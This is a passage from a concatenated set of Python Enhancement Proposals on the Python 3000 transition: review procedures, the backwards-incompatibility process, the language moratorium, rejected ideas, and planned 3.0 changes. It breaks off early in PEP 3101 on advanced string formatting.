PyChecker should run cleanly over the library. With a carefully tuned
configuration file, PyLint should also emit as few warnings as possible.
As long as these changes don’t change the module’s interface and behavior,
no documentation updates are necessary.
Enhancement of test and documentation coverage
Code coverage by unit tests varies greatly between modules. Each test
suite should be checked for completeness, and the remaining classic tests
should be converted to PyUnit (or whatever new shiny testing framework
comes with Python 3000, perhaps py.test?).
It should also be verified that each publicly visible function has a
meaningful docstring which ideally contains several doctests.
No documentation changes are necessary for enhancing test coverage.
Unification of module metadata
This is a small and probably not very important step. There have been
various attempts at providing author, version and similar metadata in
modules (such as a “__version__” global). Those could be standardized
and used throughout the library.
No documentation changes are necessary for this step, too.
Backwards incompatible bug fixes
Over the years, many bug reports have been filed which complained about
bugs in standard library modules, but have subsequently been closed as
“Won’t fix” since a fix would have introduced a major incompatibility
which was not acceptable in the Python 2.x series. In Python 3000, the
fix can be applied if the interface per se is still acceptable.
Each slight behavioral change caused by such fixes must be mentioned in
the documentation, perhaps in a “Changed in Version 3.0” paragraph.
Interface changes
The last and most disruptive change is the overhaul of a module’s public
interface. If a module’s interface is to be changed, a justification
should be made beforehand, or a PEP should be written.
The change must be fully documented as “New in Version 3.0”, and the
python3warn.py script must know about it.
References
None yet.
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 3001 – Procedure for reviewing and improving standard library modules | Process | This PEP describes a procedure for reviewing and improving standard
library modules, especially those written in Python, making them ready
for Python 3000. There can be different steps of refurbishing, each
of which is described in a section below. Of course, not every step
has to be performed for every module. |
PEP 3002 – Procedure for Backwards-Incompatible Changes
Author:
Steven Bethard <steven.bethard at gmail.com>
Status:
Final
Type:
Process
Created:
27-Mar-2006
Post-History:
27-Mar-2006, 13-Apr-2006
Table of Contents
Abstract
Rationale
Python Enhancement Proposals
Identifying Problematic Code
References
Copyright
Abstract
This PEP describes the procedure for changes to Python that are
backwards-incompatible between the Python 2.X series and Python 3000.
All such changes must be documented by an appropriate Python 3000 PEP
and must be accompanied by code that can identify when pieces of
Python 2.X code may be problematic in Python 3000.
Rationale
Python 3000 will introduce a number of backwards-incompatible changes
to Python, mainly to streamline the language and to remove some
previous design mistakes. But Python 3000 is not intended to be a new
and completely different language from the Python 2.X series, and it
is expected that much of the Python user community will make the
transition to Python 3000 when it becomes available.
To encourage this transition, it is crucial to provide a clear and
complete guide on how to upgrade Python 2.X code to Python 3000 code.
Thus, for any backwards-incompatible change, two things are required:
An official Python Enhancement Proposal (PEP)
Code that can identify pieces of Python 2.X code that may be
problematic in Python 3000
Python Enhancement Proposals
Every backwards-incompatible change must be accompanied by a PEP.
This PEP should follow the usual PEP guidelines and explain the
purpose and reasoning behind the backwards incompatible change. In
addition to the usual PEP sections, all PEPs proposing
backwards-incompatible changes must include an additional section:
Compatibility Issues. This section should describe what is backwards
incompatible about the proposed change to Python, and the major sorts
of breakage to be expected.
While PEPs must still be evaluated on a case-by-case basis, a PEP may
be inappropriate for Python 3000 if its Compatibility Issues section
implies any of the following:
Most or all instances of a Python 2.X construct are incorrect in
Python 3000, and most or all instances of the Python 3000 construct
are incorrect in Python 2.X.So for example, changing the meaning of the for-loop else-clause
from “executed when the loop was not broken out of” to “executed
when the loop had zero iterations” would mean that all Python 2.X
for-loop else-clauses would be broken, and there would be no way to
use a for-loop else-clause in a Python-3000-appropriate manner.
Thus a PEP for such an idea would likely be rejected.
Many instances of a Python 2.X construct are incorrect in Python
3000 and the PEP fails to demonstrate real-world use-cases for the
changes.Backwards incompatible changes are allowed in Python 3000, but not
to excess. A PEP that proposes backwards-incompatible changes
should provide good examples of code that visibly benefits from the
changes.
PEP-writing is time-consuming, so when a number of
backwards-incompatible changes are closely related, they should be
proposed in the same PEP. Such PEPs will likely have longer
Compatibility Issues sections, however, since they must now describe
the sorts of breakage expected from all the proposed changes.
Identifying Problematic Code
In addition to the PEP requirement, backwards incompatible changes to
Python must also be accompanied by code to issue warnings for pieces
of Python 2.X code that will behave differently in Python 3000. Such
warnings will be enabled in Python 2.X using a new command-line
switch: -3. All backwards incompatible changes should be
accompanied by a patch for Python 2.X that, when -3 is
specified, issues warnings for each construct that is being changed.
For example, if dict.keys() returns an iterator in Python 3000,
the patch to the Python 2.X branch should do something like:
If -3 was specified, change dict.keys() to return a
subclass of list that issues warnings whenever you use any
methods other than __iter__().
Such a patch would mean that warnings are only issued when features
that will not be present in Python 3000 are used, and almost all
existing code should continue to work. (Code that relies on
dict.keys() always returning a list and not a subclass should
be pretty much non-existent.)
References
TBD
Copyright
This document has been placed in the public domain.
| Final | PEP 3002 – Procedure for Backwards-Incompatible Changes | Process | This PEP describes the procedure for changes to Python that are
backwards-incompatible between the Python 2.X series and Python 3000.
All such changes must be documented by an appropriate Python 3000 PEP
and must be accompanied by code that can identify when pieces of
Python 2.X code may be problematic in Python 3000. |
PEP 3003 – Python Language Moratorium
Author:
Brett Cannon, Jesse Noller, Guido van Rossum
Status:
Final
Type:
Process
Created:
21-Oct-2009
Post-History:
03-Nov-2009
Table of Contents
Abstract
Rationale
Details
Cannot Change
Case-by-Case Exemptions
Allowed to Change
Retroactive
Extensions
Copyright
References
Abstract
This PEP proposes a temporary moratorium (suspension) of all changes
to the Python language syntax, semantics, and built-ins for a period
of at least two years from the release of Python 3.1. In particular, the
moratorium would include Python 3.2 (to be released 18-24 months after
3.1) but allow Python 3.3 (assuming it is not released prematurely) to
once again include language changes.
This suspension of features is designed to allow non-CPython implementations
to “catch up” to the core implementation of the language, help ease adoption
of Python 3.x, and provide a more stable base for the community.
Rationale
This idea was proposed by Guido van Rossum on the python-ideas [1] mailing
list. The premise of his email was to slow the alteration of the Python core
syntax, builtins and semantics to allow non-CPython implementations to catch
up to the current state of Python, both 2.x and 3.x.
Python, as a language is more than the core implementation –
CPython – with a rich, mature and vibrant community of implementations, such
as Jython [2], IronPython [3] and PyPy [4] that are a benefit not only to
the community, but to the language itself.
Still others, such as Unladen Swallow [5] (a branch of CPython) seek not to
create an alternative implementation, but rather they seek to enhance the
performance and implementation of CPython itself.
Python 3.x was a large part of the last several years of Python’s
development. Its release, as well as a bevy of changes to the language
introduced by it and the previous 2.6.x releases, puts alternative
implementations at a severe disadvantage in “keeping pace” with core python
development.
Additionally, many of the changes put into the recent releases of the language
as implemented by CPython have not yet seen widespread usage by the
general user population. For example, most users are limited to the version
of the interpreter (typically CPython) which comes pre-installed with their
operating system. Most OS vendors are just barely beginning to ship Python 2.6
– even fewer are shipping Python 3.x.
As it is expected that Python 2.7 be the effective “end of life” of the Python
2.x code line, with Python 3.x being the future, it is in the best interest of
Python core development to temporarily suspend the alteration of the language
itself to allow all of these external entities to catch up and to assist in
the adoption of, and migration to, Python 3.x
Finally, the moratorium is intended to free up cycles within core development
to focus on other issues, such as the CPython interpreter and improvements
therein, the standard library, etc.
This moratorium does not allow for exceptions – once accepted, any pending
changes to the syntax or semantics of the language will be postponed until the
moratorium is lifted.
This moratorium does not attempt to apply to any other Python implementation
meaning that if desired other implementations may add features which deviate
from the standard implementation.
Details
Cannot Change
New built-ins
Language syntaxThe grammar file essentially becomes immutable apart from ambiguity
fixes.
General language semanticsThe language operates as-is with only specific exemptions (see
below).
New __future__ importsThese are explicitly forbidden, as they effectively change the language
syntax and/or semantics (albeit using a compiler directive).
Case-by-Case Exemptions
New methods on built-insThe case for adding a method to a built-in object can be made.
Incorrect language semanticsIf the language semantics turn out to be ambiguous or improperly
implemented based on the intention of the original design then the
semantics may change.
Language semantics that are difficult to implementBecause other VMs have not begun implementing Python 3.x semantics
there is a possibility that certain semantics are too difficult to
replicate. In those cases they can be changed to ease adoption of
Python 3.x by the other VMs.
Allowed to Change
C APIIt is entirely acceptable to change the underlying C code of
CPython as long as other restrictions of this moratorium are not
broken. E.g. removing the GIL would be fine assuming certain
operations that are currently atomic remain atomic.
The standard libraryAs the standard library is not directly tied to the language
definition it is not covered by this moratorium.
Backports of 3.x features to 2.xThe moratorium only affects features that would be new in 3.x.
Import semanticsFor example, PEP 382. After all, import semantics vary between
Python implementations anyway.
Retroactive
It is important to note that the moratorium covers all changes since the release
of Python 3.1. This rule is intended to avoid features being rushed or smuggled
into the CPython source tree while the moratorium is being discussed. A review
of the NEWS file for the py3k development branch showed no commits would need to
be rolled back in order to meet this goal.
Extensions
The time period of the moratorium can only be extended through a new PEP.
Copyright
This document has been placed in the public domain.
References
[1]
https://mail.python.org/pipermail/python-ideas/2009-October/006305.html
[2]
http://www.jython.org/
[3]
http://www.codeplex.com/IronPython
[4]
http://codespeak.net/pypy/
[5]
http://code.google.com/p/unladen-swallow/
| Final | PEP 3003 – Python Language Moratorium | Process | This PEP proposes a temporary moratorium (suspension) of all changes
to the Python language syntax, semantics, and built-ins for a period
of at least two years from the release of Python 3.1. In particular, the
moratorium would include Python 3.2 (to be released 18-24 months after
3.1) but allow Python 3.3 (assuming it is not released prematurely) to
once again include language changes. |
PEP 3099 – Things that will Not Change in Python 3000
Author:
Georg Brandl <georg at python.org>
Status:
Final
Type:
Process
Created:
04-Apr-2006
Post-History:
Table of Contents
Abstract
Core language
Builtins
Standard types
Coding style
Interactive Interpreter
Copyright
Abstract
Some ideas are just bad. While some thoughts on Python evolution are
constructive, some go against the basic tenets of Python so
egregiously that it would be like asking someone to run in a circle:
it gets you nowhere, even for Python 3000, where extraordinary
proposals are allowed. This PEP tries to list all BDFL pronouncements
on Python 3000 that refer to changes that will not happen and new
features that will not be introduced, sorted by topics, along with
a short explanation or a reference to the relevant thread on the
python-3000 mailing list.
If you think you should suggest any of the listed ideas it would be
better to just step away from the computer, go outside, and enjoy
yourself. Being active outdoors by napping in a nice patch of grass
is more productive than bringing up a beating-a-dead-horse idea and
having people tell you how dead the idea is. Consider yourself warned.
Core language
Python 3000 will not be case-insensitive.
Python 3000 will not be a rewrite from scratch.
It will also not use C++ or another language different from C
as implementation language. Rather, there will be a gradual
transmogrification of the codebase. There’s an excellent essay
by Joel Spolsky explaining why:
http://www.joelonsoftware.com/articles/fog0000000069.html
self will not become implicit.
Having self be explicit is a good thing. It makes the code
clear by removing ambiguity about how a variable resolves. It also
makes the difference between functions and methods small.Thread: “Draft proposal: Implicit self in Python 3.0”
https://mail.python.org/pipermail/python-dev/2006-January/059468.html
lambda will not be renamed.
At one point lambda was slated for removal in Python 3000.
Unfortunately no one was able to come up with a better way of
providing anonymous functions. And so lambda is here to stay.But it is here to stay as-is. Adding support for statements is a
non-starter. It would require allowing multi-line lambda
expressions which would mean a multi-line expression could suddenly
exist. That would allow for multi-line arguments to function
calls, for instance. That is just plain ugly.
Thread: “genexp syntax / lambda”,
https://mail.python.org/pipermail/python-3000/2006-April/001042.html
Python will not have programmable syntax.
Thread: “It’s a statement! It’s a function! It’s BOTH!”,
https://mail.python.org/pipermail/python-3000/2006-April/000286.html
There won’t be a syntax for zip()-style parallel iteration.
Thread: “Parallel iteration syntax”,
https://mail.python.org/pipermail/python-3000/2006-March/000210.html
Strings will stay iterable.
Thread: “Making strings non-iterable”,
https://mail.python.org/pipermail/python-3000/2006-April/000759.html
There will be no syntax to sort the result of a generator expression
or list comprehension. sorted() covers all use cases.
Thread: “Adding sorting to generator comprehension”,
https://mail.python.org/pipermail/python-3000/2006-April/001295.html
Slices and extended slices won’t go away (even if the __getslice__
and __setslice__ APIs may be replaced) nor will they return views
for the standard object types.
Thread: Future of slices
https://mail.python.org/pipermail/python-3000/2006-May/001563.html
It will not be forbidden to reuse a loop variable inside the loop’s
suite.
Thread: elimination of scope bleeding of iteration variables
https://mail.python.org/pipermail/python-dev/2006-May/064761.html
The parser won’t be more complex than LL(1).
Simple is better than complex. This idea extends to the parser.
Restricting Python’s grammar to an LL(1) parser is a blessing,
not a curse. It puts us in handcuffs that prevent us from going
overboard and ending up with funky grammar rules like some other
dynamic languages that will go unnamed, such as Perl.
No braces.
This is so obvious that it doesn’t need a reference to a mailing
list. Do from __future__ import braces to get a definitive
answer on this subject.
No more backticks.
Backticks (`) will no longer be used as shorthand for repr –
but that doesn’t mean they are available for other uses. Even
ignoring the backwards compatibility confusion, the character
itself causes too many problems (in some fonts, on some keyboards,
when typesetting a book, etc).Thread: “new operators via backquoting”,
https://mail.python.org/pipermail/python-ideas/2007-January/000054.html
Referencing the global name foo will not be spelled globals.foo.
The global statement will stay.
Threads: “replace globals() and global statement with global builtin
object”,
https://mail.python.org/pipermail/python-3000/2006-July/002485.html,
“Explicit Lexical Scoping (pre-PEP?)”,
https://mail.python.org/pipermail/python-dev/2006-July/067111.html
There will be no alternative binding operators such as :=.
Thread: “Explicit Lexical Scoping (pre-PEP?)”,
https://mail.python.org/pipermail/python-dev/2006-July/066995.html
We won’t be removing container literals.
That is, {expr: expr, …}, [expr, …] and (expr, …) will stay.
Thread: “No Container Literals”,
https://mail.python.org/pipermail/python-3000/2006-July/002550.html
The else clause in while and for loops will not change
semantics, or be removed.
Thread: “for/except/else syntax”
https://mail.python.org/pipermail/python-ideas/2009-October/006083.html
Builtins
zip() won’t grow keyword arguments or other mechanisms to prevent
it from stopping at the end of the shortest sequence.
Thread: “have zip() raise exception for sequences of different lengths”,
https://mail.python.org/pipermail/python-3000/2006-August/003338.html
hash() won’t become an attribute since attributes should be cheap
to compute, which isn’t necessarily the case for a hash.
Thread: “hash as attribute/property”,
https://mail.python.org/pipermail/python-3000/2006-April/000362.html
Standard types
Iterating over a dictionary will continue to yield the keys.
Thread: “Iterating over a dict”,
https://mail.python.org/pipermail/python-3000/2006-April/000283.htmlThread: have iter(mapping) generate (key, value) pairs
https://mail.python.org/pipermail/python-3000/2006-June/002368.html
There will be no frozenlist type.
Thread: “Immutable lists”,
https://mail.python.org/pipermail/python-3000/2006-May/002219.html
int will not support subscripts yielding a range.
Thread: “xrange vs. int.__getslice__”,
https://mail.python.org/pipermail/python-3000/2006-June/002450.html
Coding style
The (recommended) maximum line width will remain 80 characters,
for both C and Python code.
Thread: “C style guide”,
https://mail.python.org/pipermail/python-3000/2006-March/000131.html
Interactive Interpreter
The interpreter prompt (>>>) will not change. It gives Guido warm
fuzzy feelings.
Thread: “Low-hanging fruit: change interpreter prompt?”,
https://mail.python.org/pipermail/python-3000/2006-November/004891.html
Copyright
This document has been placed in the public domain.
| Final | PEP 3099 – Things that will Not Change in Python 3000 | Process | Some ideas are just bad. While some thoughts on Python evolution are
constructive, some go against the basic tenets of Python so
egregiously that it would be like asking someone to run in a circle:
it gets you nowhere, even for Python 3000, where extraordinary
proposals are allowed. This PEP tries to list all BDFL pronouncements
on Python 3000 that refer to changes that will not happen and new
features that will not be introduced, sorted by topics, along with
a short explanation or a reference to the relevant thread on the
python-3000 mailing list. |
PEP 3100 – Miscellaneous Python 3.0 Plans
Author:
Brett Cannon <brett at python.org>
Status:
Final
Type:
Process
Created:
20-Aug-2004
Post-History:
Table of Contents
Abstract
General goals
Influencing PEPs
Style changes
Core language
Atomic Types
Built-in Namespace
Standard library
Outstanding Issues
References
Copyright
Abstract
This PEP, previously known as PEP 3000, describes smaller scale changes
and new features for which no separate PEP is written yet, all targeted
for Python 3000.
The list of features included in this document is subject to change
and isn’t binding on the Python development community; features may be
added, removed, and modified at any time. The purpose of this list is
to focus our language development effort on changes that are steps to
3.0, and to encourage people to invent ways to smooth the transition.
This document is not a wish-list that anyone can extend. While there
are two authors of this PEP, we’re just supplying the text; the
decisions for which changes are listed in this document are made by
Guido van Rossum, who has chosen them as goals for Python 3.0.
Guido’s pronouncements on things that will not change in Python 3.0
are recorded in PEP 3099.
General goals
A general goal is to reduce feature duplication by removing old ways
of doing things. A general principle of the design will be that one
obvious way of doing something is enough. [1]
Influencing PEPs
PEP 238 (Changing the Division Operator)
PEP 328 (Imports: Multi-Line and Absolute/Relative)
PEP 343 (The “with” Statement)
PEP 352 (Required Superclass for Exceptions)
Style changes
The C style guide will be updated to use 4-space indents, never tabs.
This style should be used for all new files; existing files can be
updated only if there is no hope to ever merge a particular file from
the Python 2 HEAD. Within a file, the indentation style should be
consistent. No other style guide changes are planned ATM.
Core language
True division becomes default behavior PEP 238 [done]
exec as a statement is not worth it – make it a function [done]
Add optional declarations for static typing PEP 3107 [10] [done]
Support only new-style classes; classic classes will be gone [1] [done]
Replace print by a function [14] PEP 3105 [done]
The softspace attribute of files goes away. [done]
Use except E1, E2, E3 as err: if you want the error variable. [3] [done]
None becomes a keyword [4]; also True and False [done]
... to become a general expression element [16] [done]
as becomes a keyword [5] (starting in 2.6 already) [done]
Have list comprehensions be syntactic sugar for passing an
equivalent generator expression to list(); as a consequence the
loop variable will no longer be exposed PEP 289 [done]
Comparisons other than == and != between disparate types
will raise an exception unless explicitly supported by the type [6] [done]
floats will not be acceptable as arguments in place of ints for operations
where floats are inadvertently accepted (PyArg_ParseTuple() i & l formats)
Remove from … import * at function scope. [done] This means that functions
can always be optimized and support for unoptimized functions can go away.
Imports PEP 328
Imports will be absolute by default. [done]
Relative imports must be explicitly specified. [done]
Indirection entries in sys.modules (i.e., a value of None for
A.string means to use the top-level string module) will not be
supported.
__init__.py might become optional in sub-packages? __init__.py will still
be required for top-level packages.
Cleanup the Py_InitModule() variants {,3,4} (also import and parser APIs)
Cleanup the APIs exported in pythonrun, etc.
Some expressions will require parentheses that didn’t in 2.x:
List comprehensions will require parentheses around the iterables.
This will make list comprehensions more similar to generator comprehensions.
[x for x in 1, 2] will need to be: [x for x in (1, 2)] [done]
Lambdas may have to be parenthesized PEP 308 [NO]
In order to get rid of the confusion between __builtin__ and __builtins__,
it was decided to rename __builtin__ (the module) to builtins, and to leave
__builtins__ (the sandbox hook) alone. [33] [34] [done]
Attributes on functions of the form func_whatever will be renamed
__whatever__ [17] [done]
Set literals and comprehensions [19] [20] [done]
{x} means set([x]); {x, y} means set([x, y]).
{F(x) for x in S if P(x)} means set(F(x) for x in S if P(x)).
NB. {range(x)} means set([range(x)]), NOT set(range(x)).
There’s no literal for an empty set; use set() (or {1}&{2} :-).
There’s no frozenset literal; they are too rarely needed.
The __nonzero__ special method will be renamed to __bool__
and have to return a bool. The typeobject slot will be called
tp_bool [23] [done]
Dict comprehensions, as first proposed in PEP 274 [done]
{K(x): V(x) for x in S if P(x)} means dict((K(x), V(x)) for x in S if P(x)).
To be removed:
String exceptions: use instances of an Exception class [2] [done]
raise Exception, "message": use raise Exception("message") [12]
[done]
x: use repr(x) [2] [done]
The <> operator: use != instead [3] [done]
The __mod__ and __divmod__ special methods on float. [they should stay] [21]
Drop unbound methods [7] [26] [done]
METH_OLDARGS [done]
WITH_CYCLE_GC [done]
__getslice__, __setslice__, __delslice__ [32];
remove slice opcodes and use slice objects. [done]
__oct__, __hex__: use __index__ in oct() and hex()
instead. [done]
__methods__ and __members__ [done]
C APIs (see code):
PyFloat_AsString, PyFloat_AsReprString, PyFloat_AsStringEx,
PySequence_In, PyEval_EvalFrame, PyEval_CallObject,
_PyObject_Del, _PyObject_GC_Del, _PyObject_GC_Track, _PyObject_GC_UnTrack
PyString_AsEncodedString, PyString_AsDecodedString
PyArg_NoArgs, PyArg_GetInt, intargfunc, intintargfuncPyImport_ReloadModule ?
Atomic Types
Remove distinction between int and long types; ‘long’ built-in type and
literals with ‘L’ or ‘l’ suffix disappear [1] [done]
Make all strings be Unicode, and have a separate bytes() type [1]
The new string type will be called ‘str’. See PEP 3137. [done]
Return iterable views instead of lists where appropriate for atomic
type methods (e.g. dict.keys(), dict.values(),
dict.items(), etc.); iter* methods will be removed. [done]
Make string.join() stringify its arguments? [18] [NO]
Fix open() so it returns a ValueError if the mode is bad rather than IOError.
[done]
To be removed:
basestring.find() and basestring.rfind(); use basestring.index()
or basestring.[r]partition() or
basestring.rindex() in a try/except block??? [13] [UNLIKELY]
file.xreadlines() method [31] [done]
dict.setdefault()? [15] [UNLIKELY]
dict.has_key() method; use in operator [done]
list.sort() and builtin.sorted() methods: eliminate cmp
parameter [27] [done]
Built-in Namespace
Make built-ins return an iterator where appropriate (e.g. range(),
zip(), map(), filter(), etc.) [done]
Remove input() and rename raw_input() to input().
If you need the old input(), use eval(input()). [done]
Introduce trunc(), which would call the __trunc__() method on its
argument; suggested use is for objects like float where calling __int__()
has data loss, but an integral representation is still desired? [8] [done]
Exception hierarchy changes PEP 352 [done]
Add a bin() function for a binary representation of integers [done]
To be removed:
apply(): use f(*args, **kw) instead [2] [done]
buffer(): must die (use a bytes() type instead) (?) [2] [done]
callable(): just use isinstance(x, collections.Callable) (?) [2] [done]
compile(): put in sys (or perhaps in a module of its own) [2]
coerce(): no longer needed [2] [done]
execfile(), reload(): use exec() [2] [done]
intern(): put in sys [2], [22] [done]
reduce(): put in functools, a loop is more readable most of the
times [2], [9] [done]
xrange(): use range() instead [1] [See range() above] [done]
StandardError: this is a relic from the original exception hierarchy;subclass Exception instead. [done]
Standard library
Reorganize the standard library to not be as shallow?
Move test code to where it belongs, there will be no more test() functions
in the standard library
Convert all tests to use either doctest or unittest.
For the procedures of standard library improvement, see PEP 3001
To be removed:
The sets module. [done]
stdlib modules to be removed
see docstrings and comments in the source
macfs [to do]
new, reconvert, stringold, xmllib,
pcre, pypcre, strop [all done]
see PEP 4
buildtools,
mimetools,
multifile,
rfc822,
[to do]
mpz, posixfile, regsub, rgbimage,
sha, statcache, sv, TERMIOS, timing [done]
cfmfile, gopherlib, md5, MimeWriter, mimify [done]
cl, sets, xreadlines, rotor, whrandom [done]
Everything in lib-old PEP 4 [done]
Para, addpack, cmp, cmpcache, codehack,
dircmp, dump, find, fmt, grep,
lockfile, newdir, ni, packmail, poly,
rand, statcache, tb, tzparse, util,
whatsound, whrandom, zmod
sys.exitfunc: use atexit module instead [28],
[35] [done]
sys.exc_type, sys.exc_values, sys.exc_traceback:
not thread-safe; use sys.exc_info() or an attribute
of the exception [2] [11] [28] [done]
sys.exc_clear: Python 3’s except statements provide the same
functionality [24] PEP 3110 [28] [done]
array.read, array.write [30]
operator.isCallable : callable() built-in is being removed
[29] [36] [done]
operator.sequenceIncludes : redundant thanks to
operator.contains [29] [36] [done]
In the thread module, the acquire_lock() and release_lock() aliases
for the acquire() and release() methods on lock objects.
(Probably also just remove the thread module as a public API,
in favor of always using threading.py.)
UserXyz classes, in favour of XyzMixins.
Remove the unreliable empty() and full() methods from Queue.py? [25]
Remove jumpahead() from the random API? [25]
Make the primitive for random be something generating random bytes
rather than random floats? [25]
Get rid of Cookie.SerialCookie and Cookie.SmartCookie? [25]
Modify the heapq.heapreplace() API to compare the new value to the top
of the heap? [25]
Outstanding Issues
Require C99, so we can use // comments, named initializers, declare variables
without introducing a new scope, among other benefits. (Also better support
for IEEE floating point issues like NaN and infinities?)
Remove support for old systems, including: BeOS, RISCOS, (SGI) Irix, Tru64
References
[1] (1, 2, 3, 4, 5)
PyCon 2003 State of the Union:
https://legacy.python.org/doc/essays/ppt/pycon2003/pycon2003.ppt
[2] (1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11)
Python Regrets:
https://legacy.python.org/doc/essays/ppt/regrets/PythonRegrets.pdf
[3] (1, 2)
Python Wiki:
https://wiki.python.org/moin/Python3.0
[4]
python-dev email (“Constancy of None”)
https://mail.python.org/pipermail/python-dev/2004-July/046294.html
[5]
python-dev email (’ “as” to be a keyword?’)
https://mail.python.org/pipermail/python-dev/2004-July/046316.html
[6]
python-dev email (“Comparing heterogeneous types”)
https://mail.python.org/pipermail/python-dev/2004-June/045111.html
[7]
python-dev email (“Let’s get rid of unbound methods”)
https://mail.python.org/pipermail/python-dev/2005-January/050625.html
[8]
python-dev email (“Fixing _PyEval_SliceIndex so that integer-like
objects can be used”)
https://mail.python.org/pipermail/python-dev/2005-February/051674.html
[9]
Guido’s blog (“The fate of reduce() in Python 3000”)
https://www.artima.com/weblogs/viewpost.jsp?thread=98196
[10]
Guido’s blog (“Python Optional Typechecking Redux”)
https://www.artima.com/weblogs/viewpost.jsp?thread=89161
[11]
python-dev email (“anonymous blocks”)
https://mail.python.org/pipermail/python-dev/2005-April/053060.html
[12]
python-dev email (“PEP 8: exception style”)
https://mail.python.org/pipermail/python-dev/2005-August/055190.html
[13]
python-dev email (Remove str.find in 3.0?)
https://mail.python.org/pipermail/python-dev/2005-August/055705.html
[14]
python-dev email (Replacement for print in Python 3.0)
https://mail.python.org/pipermail/python-dev/2005-September/056154.html
[15]
python-dev email (“defaultdict”)
https://mail.python.org/pipermail/python-dev/2006-February/061261.html
[16]
python-3000 email
https://mail.python.org/pipermail/python-3000/2006-April/000996.html
[17]
python-3000 email (“Pronouncement on parameter lists”)
https://mail.python.org/pipermail/python-3000/2006-April/001175.html
[18]
python-3000 email (“More wishful thinking”)
https://mail.python.org/pipermail/python-3000/2006-April/000810.html
[19]
python-3000 email (“sets in P3K?”)
https://mail.python.org/pipermail/python-3000/2006-April/001286.html
[20]
python-3000 email (“sets in P3K?”)
https://mail.python.org/pipermail/python-3000/2006-May/001666.html
[21]
python-3000 email (“bug in modulus?”)
https://mail.python.org/pipermail/python-3000/2006-May/001735.html
[22]
SF patch “sys.id() and sys.intern()”
https://bugs.python.org/issue1601678
[23]
python-3000 email (“__nonzero__ vs. __bool__”)
https://mail.python.org/pipermail/python-3000/2006-November/004524.html
[24]
python-3000 email (“Pre-peps on raise and except changes”)
https://mail.python.org/pipermail/python-3000/2007-February/005672.html
[25] (1, 2, 3, 4, 5)
python-3000 email (“Py3.0 Library Ideas”)
https://mail.python.org/pipermail/python-3000/2007-February/005726.html
[26]
python-dev email (“Should we do away with unbound methods in Py3k?”)
https://mail.python.org/pipermail/python-dev/2007-November/075279.html
[27]
python-dev email (“Mutable sequence .sort() signature”)
https://mail.python.org/pipermail/python-dev/2008-February/076818.html
[28] (1, 2, 3)
Python docs (sys – System-specific parameters and functions)
https://docs.python.org/release/2.6/library/sys.html
[29] (1, 2)
Python docs (operator – Standard operators as functions)
https://docs.python.org/release/2.6/library/operator.html
[30]
Python docs (array – Efficient arrays of numeric values)
https://docs.python.org/release/2.6/library/array.html
[31]
Python docs (File objects)
https://docs.python.org/release/2.6/library/stdtypes.html
[32]
Python docs (Additional methods for emulation of sequence types)
https://docs.python.org/release/2.6/reference/datamodel.html#additional-methods-for-emulation-of-sequence-types
[33]
Approach to resolving __builtin__ vs __builtins__
https://mail.python.org/pipermail/python-3000/2007-March/006161.html
[34]
New name for __builtins__
https://mail.python.org/pipermail/python-dev/2007-November/075388.html
[35]
Patch to remove sys.exitfunc
https://github.com/python/cpython/issues/44715
[36] (1, 2)
Remove deprecated functions from operator
https://github.com/python/cpython/issues/43602
Copyright
This document has been placed in the public domain.
| Final | PEP 3100 – Miscellaneous Python 3.0 Plans | Process | This PEP, previously known as PEP 3000, describes smaller scale changes
and new features for which no separate PEP is written yet, all targeted
for Python 3000. |
PEP 3101 – Advanced String Formatting
Author:
Talin <viridia at gmail.com>
Status:
Final
Type:
Standards Track
Created:
16-Apr-2006
Python-Version:
3.0
Post-History:
28-Apr-2006, 06-May-2006, 10-Jun-2007, 14-Aug-2007, 14-Sep-2008
Table of Contents
Abstract
Rationale
Specification
String Methods
Format Strings
Simple and Compound Field Names
Format Specifiers
Standard Format Specifiers
Explicit Conversion Flag
Controlling Formatting on a Per-Type Basis
User-Defined Formatting
Formatter Methods
Customizing Formatters
Error handling
Alternate Syntax
Alternate Feature Proposals
Security Considerations
Sample Implementation
Backwards Compatibility
References
Copyright
Abstract
This PEP proposes a new system for built-in string formatting
operations, intended as a replacement for the existing ‘%’ string
formatting operator.
Rationale
Python currently provides two methods of string interpolation:
The ‘%’ operator for strings. [1]
The string.Template module. [2]
The primary scope of this PEP concerns proposals for built-in
string formatting operations (in other words, methods of the
built-in string type).
The ‘%’ operator is primarily limited by the fact that it is a
binary operator, and therefore can take at most two arguments.
One of those arguments is already dedicated to the format string,
leaving all other variables to be squeezed into the remaining
argument. The current practice is to use either a dictionary or a
tuple as the second argument, but as many people have commented
[3], this lacks flexibility. The “all or nothing” approach
(meaning that one must choose between only positional arguments,
or only named arguments) is felt to be overly constraining.
While there is some overlap between this proposal and
string.Template, it is felt that each serves a distinct need,
and that one does not obviate the other. This proposal is for
a mechanism which, like ‘%’, is efficient for small strings
which are only used once, so, for example, compilation of a
string into a template is not contemplated in this proposal,
although the proposal does take care to define format strings
and the API in such a way that an efficient template package
could reuse the syntax and even some of the underlying
formatting code.
Specification
The specification will consist of the following parts:
Specification of a new formatting method to be added to the
built-in string class.
Specification of functions and flag values to be added to
the string module, so that the underlying formatting engine
can be used with additional options.
Specification of a new syntax for format strings.
Specification of a new set of special methods to control the
formatting and conversion of objects.
Specification of an API for user-defined formatting classes.
Specification of how formatting errors are handled.
Note on string encodings: When discussing this PEP in the context
of Python 3.0, it is assumed that all strings are unicode strings,
and that the use of the word ‘string’ in the context of this
document will generally refer to a Python 3.0 string, which is
the same as Python 2.x unicode object.
In the context of Python 2.x, the use of the word ‘string’ in this
document refers to an object which may either be a regular string
or a unicode object. All of the function call interfaces
described in this PEP can be used for both strings and unicode
objects, and in all cases there is sufficient information
to be able to properly deduce the output string type (in
other words, there is no need for two separate APIs).
In all cases, the type of the format string dominates - that
is, the result of the conversion will always result in an object
that contains the same representation of characters as the
input format string.
String Methods
The built-in string class (and also the unicode class in 2.6) will
gain a new method, ‘format’, which takes an arbitrary number of
positional and keyword arguments:
"The story of {0}, {1}, and {c}".format(a, b, c=d)
Within a format string, each positional argument is identified
with a number, starting from zero, so in the above example, ‘a’ is
argument 0 and ‘b’ is argument 1. Each keyword argument is
identified by its keyword name, so in the above example, ‘c’ is
used to refer to the third argument.
There is also a global built-in function, ‘format’ which formats
a single value:
print(format(10.0, "7.3g"))
This function is described in a later section.
Format Strings
Format strings consist of intermingled character data and markup.
Character data is data which is transferred unchanged from the
format string to the output string; markup is not transferred from
the format string directly to the output, but instead is used to
define ‘replacement fields’ that describe to the format engine
what should be placed in the output string in place of the markup.
